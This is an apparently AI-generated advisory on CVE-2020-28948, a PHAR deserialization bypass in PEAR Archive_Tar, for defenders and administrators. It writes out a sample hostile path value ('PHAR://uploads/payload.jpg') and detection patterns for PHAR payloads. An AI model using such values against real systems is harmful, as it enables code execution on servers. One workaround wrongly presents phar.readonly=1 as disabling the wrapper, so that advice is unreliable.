CVE-2020-28948 Overview
CVE-2020-28948 is an insecure deserialization vulnerability in PEAR Archive_Tar through version 1.4.10. The library implements a block list that filters the lowercase phar: stream wrapper prefix, but fails to filter the uppercase PHAR: variant. PHP stream wrappers are case-insensitive, so an attacker who controls a filename passed to Archive_Tar can trigger PHAR deserialization and execute arbitrary PHP object methods via magic gadgets [CWE-502]. The flaw affects Drupal core, Debian, Fedora, and Gentoo distributions that ship the PEAR Archive_Tar component.
Critical Impact
Successful exploitation leads to arbitrary code execution in the context of the PHP process handling untrusted archive input.
Affected Products
- PEAR Archive_Tar through 1.4.10
- Drupal core (fixed in SA-CORE-2020-013)
- Debian Linux 9 and 10, Fedora 32–35, Gentoo
Discovery Timeline
- 2020-11-19 - CVE-2020-28948 published to NVD
- 2020-11-19 - Debian Security Advisory DSA-4817 released
- 2020-11-25 - Drupal Security Advisory SA-CORE-2020-013 released
- 2024-11-21 - Last updated in NVD database
Technical Details for CVE-2020-28948
Vulnerability Analysis
Archive_Tar is a PEAR library used to read and write tar archives. The library added a check to prevent processing of filenames using the phar:// stream wrapper, since PHAR streams trigger automatic deserialization of the archive's metadata when accessed by functions such as file_exists, fopen, or stat. The check compared the lowercase string phar: against the supplied filename. PHP stream wrapper resolution is case-insensitive, so a filename beginning with PHAR: bypasses the filter while still being treated as a PHAR stream by the engine. An attacker who can influence a path argument passed to Archive_Tar, for example through a file upload or an administrative archive import flow in Drupal, can host a crafted PHAR archive and trigger deserialization of attacker-controlled objects. Combined with a magic-method gadget chain from the surrounding application, this yields arbitrary code execution.
Root Cause
The root cause is incomplete input validation of the protocol prefix. The string comparison filters only the lowercase form, while PHP itself accepts any case variation of the wrapper name. Refer to the PEAR Archive_Tar GitHub issue for upstream discussion.
Attack Vector
Exploitation requires local access or user interaction, typically uploading a crafted file with a .phar payload renamed to a benign extension and then causing the application to pass a filename such as PHAR://uploads/payload.jpg to Archive_Tar. The deserialization occurs implicitly when the library calls filesystem functions on the path. No memory corruption is involved; the vulnerability is entirely a logic flaw in PHP object handling.
Detection Methods for CVE-2020-28948
Indicators of Compromise
- Files uploaded with .phar extensions, or non-archive extensions whose contents start with the PHAR magic bytes __HALT_COMPILER();
- Web server or application logs containing path arguments beginning with PHAR:, Phar:, or mixed-case variants of the wrapper
- Unexpected child processes spawned by the PHP-FPM or web server worker after archive operations
Detection Strategies
- Inspect application code paths that pass user-influenced filenames to Archive_Tar constructors or to extract() and listContent() methods
- Scan installed PHP dependencies for Archive_Tar versions at or below 1.4.10, including bundled copies inside Drupal core
- Monitor PHP error and access logs for serialization-related warnings such as __wakeup, __destruct, or unserialize() notices originating from web request handlers
Monitoring Recommendations
- Alert on writes to web-accessible directories of files containing PHAR signatures
- Track outbound network connections initiated by PHP worker processes immediately after archive upload endpoints are hit
- Correlate file upload events with subsequent process executions on the host
How to Mitigate CVE-2020-28948
Immediate Actions Required
- Upgrade PEAR Archive_Tar to 1.4.11 or later, which filters the prefix case-insensitively
- Apply Drupal core updates per Drupal Security Advisory SA-CORE-2020-013
- Apply distribution updates referenced in Debian DSA-4817 and Gentoo GLSA 202101-23
- Audit applications for any remaining bundled copies of Archive_Tar not managed by the system package manager
Patch Information
Upstream fix is tracked in the PEAR Archive_Tar repository. Distribution patches are available through Debian LTS and multiple Fedora package announcements.
Workarounds
- Restrict the file extensions accepted by upload endpoints and reject files whose contents begin with the __HALT_COMPILER(); PHAR signature
- Disable the phar stream wrapper at runtime where it is not required by setting phar.readonly=1 and removing phar from disable_functions-equivalent stream wrapper registrations
- Process untrusted archives in an isolated, non-privileged container without write access to web roots
# Verify installed Archive_Tar version on Debian/Ubuntu
dpkg -l | grep -i archive-tar
# Force upgrade via Composer for application-bundled copies
composer require pear/archive_tar:^1.4.14 --update-with-dependencies
# Confirm PHAR write protection is enabled
php -r "echo ini_get('phar.readonly');"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
